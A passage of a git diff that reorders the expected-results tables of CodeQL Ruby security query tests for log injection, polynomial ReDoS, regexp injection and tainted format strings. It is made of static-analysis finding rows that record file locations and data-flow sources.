app/controllers/users_controller.rb:34:33:34:43 | unsanitized | Log entry depends on a $@. | app/controllers/users_controller.rb:33:19:33:25 | call to cookies | user-provided value | +| app/controllers/users_controller.rb:35:33:35:55 | ... + ... | app/controllers/users_controller.rb:33:19:33:25 | call to cookies | app/controllers/users_controller.rb:35:33:35:55 | ... + ... | Log entry depends on a $@. | app/controllers/users_controller.rb:33:19:33:25 | call to cookies | user-provided value | +| app/controllers/users_controller.rb:49:19:49:30 | ...[...] | app/controllers/users_controller.rb:49:19:49:24 | call to params | app/controllers/users_controller.rb:49:19:49:30 | ...[...] | Log entry depends on a $@. | app/controllers/users_controller.rb:49:19:49:24 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-1333-polynomial-redos/PolynomialReDoS.expected b/ruby/ql/test/query-tests/security/cwe-1333-polynomial-redos/PolynomialReDoS.expected index 7d333ca4dbaa..79d6c72fa3f5 100644 --- a/ruby/ql/test/query-tests/security/cwe-1333-polynomial-redos/PolynomialReDoS.expected +++ b/ruby/ql/test/query-tests/security/cwe-1333-polynomial-redos/PolynomialReDoS.expected @@ -1,32 +1,3 @@ -#select -| PolynomialReDoS.rb:10:5:10:17 | ... =~ ... | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:10:5:10:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:11:5:11:17 | ... !~ ... | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:11:5:11:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:12:5:12:15 | ...[...] | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:12:5:12:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:13:5:13:23 | call to gsub | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:13:5:13:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:14:5:14:20 | call to index | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:14:5:14:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:15:5:15:20 | call to match | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:15:5:15:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:16:5:16:21 | call to match? | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:16:5:16:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:17:5:17:24 | call to partition | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:17:5:17:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:18:5:18:21 | call to rindex | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:18:5:18:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:19:5:19:25 | call to rpartition | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:19:5:19:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:20:5:20:19 | call to scan | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:20:5:20:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:21:5:21:20 | call to split | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:21:5:21:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:22:5:22:22 | call to sub | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:22:5:22:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:23:5:23:20 | call to match | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:23:17:23:20 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:24:5:24:21 | call to match? | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:24:18:24:21 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:28:5:28:21 | call to gsub! | PolynomialReDoS.rb:27:9:27:14 | call to params | PolynomialReDoS.rb:28:5:28:5 | a | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:27:9:27:14 | call to params | user-provided value | -| PolynomialReDoS.rb:30:5:30:18 | call to slice! | PolynomialReDoS.rb:29:9:29:14 | call to params | PolynomialReDoS.rb:30:5:30:5 | b | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:29:9:29:14 | call to params | user-provided value | -| PolynomialReDoS.rb:32:5:32:20 | call to sub! | PolynomialReDoS.rb:31:9:31:14 | call to params | PolynomialReDoS.rb:32:5:32:5 | c | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:31:9:31:14 | call to params | user-provided value | -| PolynomialReDoS.rb:42:5:45:7 | case ... | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:42:10:42:13 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:47:5:50:7 | case ... | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:47:10:47:13 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:48:14:48:16 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | -| PolynomialReDoS.rb:62:5:62:22 | call to gsub | PolynomialReDoS.rb:54:12:54:17 | call to params | PolynomialReDoS.rb:62:5:62:9 | input | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:56:31:56:33 | \\s+ | regular expression | PolynomialReDoS.rb:54:12:54:17 | call to params | user-provided value | -| PolynomialReDoS.rb:66:5:66:34 | call to match? | PolynomialReDoS.rb:54:12:54:17 | call to params | PolynomialReDoS.rb:66:5:66:9 | input | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:58:30:58:32 | \\s+ | regular expression | PolynomialReDoS.rb:54:12:54:17 | call to params | user-provided value | -| PolynomialReDoS.rb:77:5:77:22 | call to gsub | PolynomialReDoS.rb:70:12:70:17 | call to params | PolynomialReDoS.rb:77:5:77:9 | input | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:72:28:72:30 | \\s+ | regular expression | PolynomialReDoS.rb:70:12:70:17 | call to params | user-provided value | -| PolynomialReDoS.rb:105:5:105:23 | ... =~ ... | PolynomialReDoS.rb:103:12:103:17 | call to params | PolynomialReDoS.rb:105:5:105:8 | name | This $@ that depends on a $@ may run slow on strings starting with '''' and with many repetitions of ' '. | PolynomialReDoS.rb:100:397:100:399 | \\s* | regular expression | PolynomialReDoS.rb:103:12:103:17 | call to params | user-provided value | -| PolynomialReDoS.rb:105:5:105:23 | ... =~ ... | PolynomialReDoS.rb:103:12:103:17 | call to params | PolynomialReDoS.rb:105:5:105:8 | name | This $@ that depends on a $@ may run slow on strings starting with '''' and with many repetitions of ' '. | PolynomialReDoS.rb:100:405:100:407 | \\s* | regular expression | PolynomialReDoS.rb:103:12:103:17 | call to params | user-provided value | -| lib/index.rb:4:13:4:26 | call to match | lib/index.rb:2:11:2:11 | x | lib/index.rb:4:13:4:13 | x | This $@ that depends on a $@ may run slow on strings with many repetitions of 'a'. | lib/index.rb:4:22:4:23 | a+ | regular expression | lib/index.rb:2:11:2:11 | x | library input | -| lib/index.rb:9:15:9:28 | call to match | lib/index.rb:8:13:8:13 | x | lib/index.rb:9:15:9:15 | x | This $@ that depends on a $@ may run slow on strings with many repetitions of 'a'. | lib/index.rb:9:24:9:25 | a+ | regular expression | lib/index.rb:8:13:8:13 | x | library input | -| lib/index.rb:11:16:11:276 | call to match | lib/index.rb:8:13:8:13 | x | lib/index.rb:11:16:11:16 | x | This $@ that depends on a $@ may run slow on strings starting with 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC' and with many repetitions of 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC'. | lib/index.rb:11:271:11:272 | .* | regular expression | lib/index.rb:8:13:8:13 | x | library input | edges | PolynomialReDoS.rb:4:5:4:8 | name | PolynomialReDoS.rb:10:5:10:8 | name | provenance | | | PolynomialReDoS.rb:4:5:4:8 | name | PolynomialReDoS.rb:11:5:11:8 | name | provenance | | @@ -133,3 +104,32 @@ nodes | lib/index.rb:9:15:9:15 | x | semmle.label | x | | lib/index.rb:11:16:11:16 | x | semmle.label | x | subpaths +#select +| PolynomialReDoS.rb:10:5:10:17 | ... =~ ... | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:10:5:10:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:11:5:11:17 | ... !~ ... | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:11:5:11:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:12:5:12:15 | ...[...] | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:12:5:12:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:13:5:13:23 | call to gsub | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:13:5:13:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:14:5:14:20 | call to index | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:14:5:14:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:15:5:15:20 | call to match | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:15:5:15:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:16:5:16:21 | call to match? | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:16:5:16:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:17:5:17:24 | call to partition | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:17:5:17:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:18:5:18:21 | call to rindex | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:18:5:18:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:19:5:19:25 | call to rpartition | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:19:5:19:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:20:5:20:19 | call to scan | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:20:5:20:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:21:5:21:20 | call to split | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:21:5:21:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:22:5:22:22 | call to sub | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:22:5:22:8 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:23:5:23:20 | call to match | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:23:17:23:20 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:24:5:24:21 | call to match? | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:24:18:24:21 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:28:5:28:21 | call to gsub! | PolynomialReDoS.rb:27:9:27:14 | call to params | PolynomialReDoS.rb:28:5:28:5 | a | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:27:9:27:14 | call to params | user-provided value | +| PolynomialReDoS.rb:30:5:30:18 | call to slice! | PolynomialReDoS.rb:29:9:29:14 | call to params | PolynomialReDoS.rb:30:5:30:5 | b | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:29:9:29:14 | call to params | user-provided value | +| PolynomialReDoS.rb:32:5:32:20 | call to sub! | PolynomialReDoS.rb:31:9:31:14 | call to params | PolynomialReDoS.rb:32:5:32:5 | c | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:31:9:31:14 | call to params | user-provided value | +| PolynomialReDoS.rb:42:5:45:7 | case ... | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:42:10:42:13 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:7:19:7:21 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:47:5:50:7 | case ... | PolynomialReDoS.rb:4:12:4:17 | call to params | PolynomialReDoS.rb:47:10:47:13 | name | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:48:14:48:16 | \\s+ | regular expression | PolynomialReDoS.rb:4:12:4:17 | call to params | user-provided value | +| PolynomialReDoS.rb:62:5:62:22 | call to gsub | PolynomialReDoS.rb:54:12:54:17 | call to params | PolynomialReDoS.rb:62:5:62:9 | input | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:56:31:56:33 | \\s+ | regular expression | PolynomialReDoS.rb:54:12:54:17 | call to params | user-provided value | +| PolynomialReDoS.rb:66:5:66:34 | call to match? | PolynomialReDoS.rb:54:12:54:17 | call to params | PolynomialReDoS.rb:66:5:66:9 | input | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:58:30:58:32 | \\s+ | regular expression | PolynomialReDoS.rb:54:12:54:17 | call to params | user-provided value | +| PolynomialReDoS.rb:77:5:77:22 | call to gsub | PolynomialReDoS.rb:70:12:70:17 | call to params | PolynomialReDoS.rb:77:5:77:9 | input | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | PolynomialReDoS.rb:72:28:72:30 | \\s+ | regular expression | PolynomialReDoS.rb:70:12:70:17 | call to params | user-provided value | +| PolynomialReDoS.rb:105:5:105:23 | ... =~ ... | PolynomialReDoS.rb:103:12:103:17 | call to params | PolynomialReDoS.rb:105:5:105:8 | name | This $@ that depends on a $@ may run slow on strings starting with '''' and with many repetitions of ' '. | PolynomialReDoS.rb:100:397:100:399 | \\s* | regular expression | PolynomialReDoS.rb:103:12:103:17 | call to params | user-provided value | +| PolynomialReDoS.rb:105:5:105:23 | ... =~ ... | PolynomialReDoS.rb:103:12:103:17 | call to params | PolynomialReDoS.rb:105:5:105:8 | name | This $@ that depends on a $@ may run slow on strings starting with '''' and with many repetitions of ' '. | PolynomialReDoS.rb:100:405:100:407 | \\s* | regular expression | PolynomialReDoS.rb:103:12:103:17 | call to params | user-provided value | +| lib/index.rb:4:13:4:26 | call to match | lib/index.rb:2:11:2:11 | x | lib/index.rb:4:13:4:13 | x | This $@ that depends on a $@ may run slow on strings with many repetitions of 'a'. | lib/index.rb:4:22:4:23 | a+ | regular expression | lib/index.rb:2:11:2:11 | x | library input | +| lib/index.rb:9:15:9:28 | call to match | lib/index.rb:8:13:8:13 | x | lib/index.rb:9:15:9:15 | x | This $@ that depends on a $@ may run slow on strings with many repetitions of 'a'. | lib/index.rb:9:24:9:25 | a+ | regular expression | lib/index.rb:8:13:8:13 | x | library input | +| lib/index.rb:11:16:11:276 | call to match | lib/index.rb:8:13:8:13 | x | lib/index.rb:11:16:11:16 | x | This $@ that depends on a $@ may run slow on strings starting with 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC' and with many repetitions of 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC'. | lib/index.rb:11:271:11:272 | .* | regular expression | lib/index.rb:8:13:8:13 | x | library input | diff --git a/ruby/ql/test/query-tests/security/cwe-1333-regexp-injection/RegExpInjection.expected b/ruby/ql/test/query-tests/security/cwe-1333-regexp-injection/RegExpInjection.expected index 6a4c79e1fa4f..13643e2c07e5 100644 --- a/ruby/ql/test/query-tests/security/cwe-1333-regexp-injection/RegExpInjection.expected +++ b/ruby/ql/test/query-tests/security/cwe-1333-regexp-injection/RegExpInjection.expected @@ -1,9 +1,3 @@ -#select -| RegExpInjection.rb:5:13:5:21 | /#{...}/ | RegExpInjection.rb:4:12:4:17 | call to params | RegExpInjection.rb:5:13:5:21 | /#{...}/ | This regular expression depends on a $@. | RegExpInjection.rb:4:12:4:17 | call to params | user-provided value | -| RegExpInjection.rb:11:13:11:27 | /foo#{...}bar/ | RegExpInjection.rb:10:12:10:17 | call to params | RegExpInjection.rb:11:13:11:27 | /foo#{...}bar/ | This regular expression depends on a $@. | RegExpInjection.rb:10:12:10:17 | call to params | user-provided value | -| RegExpInjection.rb:17:24:17:27 | name | RegExpInjection.rb:16:12:16:17 | call to params | RegExpInjection.rb:17:24:17:27 | name | This regular expression depends on a $@. | RegExpInjection.rb:16:12:16:17 | call to params | user-provided value | -| RegExpInjection.rb:23:24:23:33 | ... + ... | RegExpInjection.rb:22:12:22:17 | call to params | RegExpInjection.rb:23:24:23:33 | ... + ... | This regular expression depends on a $@. | RegExpInjection.rb:22:12:22:17 | call to params | user-provided value | -| RegExpInjection.rb:55:28:55:37 | ... + ... | RegExpInjection.rb:54:12:54:17 | call to params | RegExpInjection.rb:55:28:55:37 | ... + ... | This regular expression depends on a $@. | RegExpInjection.rb:54:12:54:17 | call to params | user-provided value | edges | RegExpInjection.rb:4:5:4:8 | name | RegExpInjection.rb:5:13:5:21 | /#{...}/ | provenance | AdditionalTaintStep | | RegExpInjection.rb:4:12:4:17 | call to params | RegExpInjection.rb:4:12:4:24 | ...[...] | provenance | | @@ -48,3 +42,9 @@ nodes | RegExpInjection.rb:55:28:55:37 | ... + ... | semmle.label | ... + ... | | RegExpInjection.rb:55:34:55:37 | name | semmle.label | name | subpaths +#select +| RegExpInjection.rb:5:13:5:21 | /#{...}/ | RegExpInjection.rb:4:12:4:17 | call to params | RegExpInjection.rb:5:13:5:21 | /#{...}/ | This regular expression depends on a $@. | RegExpInjection.rb:4:12:4:17 | call to params | user-provided value | +| RegExpInjection.rb:11:13:11:27 | /foo#{...}bar/ | RegExpInjection.rb:10:12:10:17 | call to params | RegExpInjection.rb:11:13:11:27 | /foo#{...}bar/ | This regular expression depends on a $@. | RegExpInjection.rb:10:12:10:17 | call to params | user-provided value | +| RegExpInjection.rb:17:24:17:27 | name | RegExpInjection.rb:16:12:16:17 | call to params | RegExpInjection.rb:17:24:17:27 | name | This regular expression depends on a $@. | RegExpInjection.rb:16:12:16:17 | call to params | user-provided value | +| RegExpInjection.rb:23:24:23:33 | ... + ... | RegExpInjection.rb:22:12:22:17 | call to params | RegExpInjection.rb:23:24:23:33 | ... + ... | This regular expression depends on a $@. | RegExpInjection.rb:22:12:22:17 | call to params | user-provided value | +| RegExpInjection.rb:55:28:55:37 | ... + ... | RegExpInjection.rb:54:12:54:17 | call to params | RegExpInjection.rb:55:28:55:37 | ... + ... | This regular expression depends on a $@. | RegExpInjection.rb:54:12:54:17 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-134/TaintedFormatString.expected b/ruby/ql/test/query-tests/security/cwe-134/TaintedFormatString.expected index 58907596bd7d..104b9d3ada07 100644 --- a/ruby/ql/test/query-tests/security/cwe-134/TaintedFormatString.expected +++ b/ruby/ql/test/query-tests/security/cwe-134/TaintedFormatString.expected @@ -1,17 +1,3 @@ -#select -| tainted_format_string.rb:4:12:4:26 | ...[...] | tainted_format_string.rb:4:12:4:17 | call to params | tainted_format_string.rb:4:12:4:26 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:4:12:4:17 | call to params | user-provided value | -| tainted_format_string.rb:5:19:5:33 | ...[...] | tainted_format_string.rb:5:19:5:24 | call to params | tainted_format_string.rb:5:19:5:33 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:5:19:5:24 | call to params | user-provided value | -| tainted_format_string.rb:10:23:10:37 | ...[...] | tainted_format_string.rb:10:23:10:28 | call to params | tainted_format_string.rb:10:23:10:37 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:10:23:10:28 | call to params | user-provided value | -| tainted_format_string.rb:11:30:11:44 | ...[...] | tainted_format_string.rb:11:30:11:35 | call to params | tainted_format_string.rb:11:30:11:44 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:11:30:11:35 | call to params | user-provided value | -| tainted_format_string.rb:18:23:18:37 | ...[...] | tainted_format_string.rb:18:23:18:28 | call to params | tainted_format_string.rb:18:23:18:37 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:18:23:18:28 | call to params | user-provided value | -| tainted_format_string.rb:19:30:19:44 | ...[...] | tainted_format_string.rb:19:30:19:35 | call to params | tainted_format_string.rb:19:30:19:44 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:19:30:19:35 | call to params | user-provided value | -| tainted_format_string.rb:21:27:21:41 | ...[...] | tainted_format_string.rb:21:27:21:32 | call to params | tainted_format_string.rb:21:27:21:41 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:21:27:21:32 | call to params | user-provided value | -| tainted_format_string.rb:22:20:22:34 | ...[...] | tainted_format_string.rb:22:20:22:25 | call to params | tainted_format_string.rb:22:20:22:34 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:22:20:22:25 | call to params | user-provided value | -| tainted_format_string.rb:28:19:28:33 | ...[...] | tainted_format_string.rb:28:19:28:24 | call to params | tainted_format_string.rb:28:19:28:33 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:28:19:28:24 | call to params | user-provided value | -| tainted_format_string.rb:33:12:33:46 | ... + ... | tainted_format_string.rb:33:32:33:37 | call to params | tainted_format_string.rb:33:12:33:46 | ... + ... | Format string depends on a $@. | tainted_format_string.rb:33:32:33:37 | call to params | user-provided value | -| tainted_format_string.rb:36:12:36:46 | "A log message: #{...}" | tainted_format_string.rb:36:30:36:35 | call to params | tainted_format_string.rb:36:12:36:46 | "A log message: #{...}" | Format string depends on a $@. | tainted_format_string.rb:36:30:36:35 | call to params | user-provided value | -| tainted_format_string.rb:39:5:39:45 | "A log message #{...} %{foo}" | tainted_format_string.rb:39:22:39:27 | call to params | tainted_format_string.rb:39:5:39:45 | "A log message #{...} %{foo}" | Format string depends on a $@. | tainted_format_string.rb:39:22:39:27 | call to params | user-provided value | -| tainted_format_string.rb:42:5:42:43 | "A log message #{...} %08x" | tainted_format_string.rb:42:22:42:27 | call to params | tainted_format_string.rb:42:5:42:43 | "A log message #{...} %08x" | Format string depends on a $@. | tainted_format_string.rb:42:22:42:27 | call to params | user-provided value | edges | tainted_format_string.rb:4:12:4:17 | call to params | tainted_format_string.rb:4:12:4:26 | ...[...] | provenance | | | tainted_format_string.rb:5:19:5:24 | call to params | tainted_format_string.rb:5:19:5:33 | ...[...] | provenance | | @@ -62,3 +48,17 @@ nodes | tainted_format_string.rb:42:22:42:27 | call to params | semmle.label | call to params | | tainted_format_string.rb:42:22:42:36 | ...[...] | semmle.label | ...[...] | subpaths +#select +| tainted_format_string.rb:4:12:4:26 | ...[...] | tainted_format_string.rb:4:12:4:17 | call to params | tainted_format_string.rb:4:12:4:26 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:4:12:4:17 | call to params | user-provided value | +| tainted_format_string.rb:5:19:5:33 | ...[...] | tainted_format_string.rb:5:19:5:24 | call to params | tainted_format_string.rb:5:19:5:33 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:5:19:5:24 | call to params | user-provided value | +| tainted_format_string.rb:10:23:10:37 | ...[...] | tainted_format_string.rb:10:23:10:28 | call to params | tainted_format_string.rb:10:23:10:37 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:10:23:10:28 | call to params | user-provided value | +| tainted_format_string.rb:11:30:11:44 | ...[...] | tainted_format_string.rb:11:30:11:35 | call to params | tainted_format_string.rb:11:30:11:44 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:11:30:11:35 | call to params | user-provided value | +| tainted_format_string.rb:18:23:18:37 | ...[...] | tainted_format_string.rb:18:23:18:28 | call to params | tainted_format_string.rb:18:23:18:37 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:18:23:18:28 | call to params | user-provided value | +| tainted_format_string.rb:19:30:19:44 | 